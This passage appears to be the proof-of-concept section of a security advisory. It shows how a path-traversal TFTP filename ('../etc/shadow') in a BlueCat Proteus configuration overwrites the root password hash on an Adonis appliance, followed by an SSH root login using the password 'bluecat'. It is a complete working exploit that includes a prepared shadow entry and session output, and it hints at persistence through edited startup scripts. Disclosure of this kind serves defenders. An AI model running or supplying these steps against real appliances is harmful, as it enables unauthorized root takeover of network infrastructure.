0) Create a new TFTP Group in a Proteus configuration.

  1) Add a TFTP deployment role specifying an Adonis appliance to
     the group.

  2) At the top-level folder in the new TFTP group, add a file
     named "../etc/shadow" (without the quotes) and load a file
     containing the following line:

     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

     NOTE: The sshd configuration uses the default setting
     'PermitEmptyPasswords no', so we specify a password of
     bluecat.

  3) Deploy the configuration to the Adonis appliance.

  4) You can now login to the Adonis appliance as root with
     password bluecat.

     $ ssh root@192.168.1.11
     root@192.168.1.11's password:
     # cat /etc/shadow
     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

     NOTE: This example assumes SSH is enabled, iptables permits
     port tcp/22, etc.

  Many attack variations are possible, such as changing system
  startup scripts to modify the iptables configuration on the
  appliance.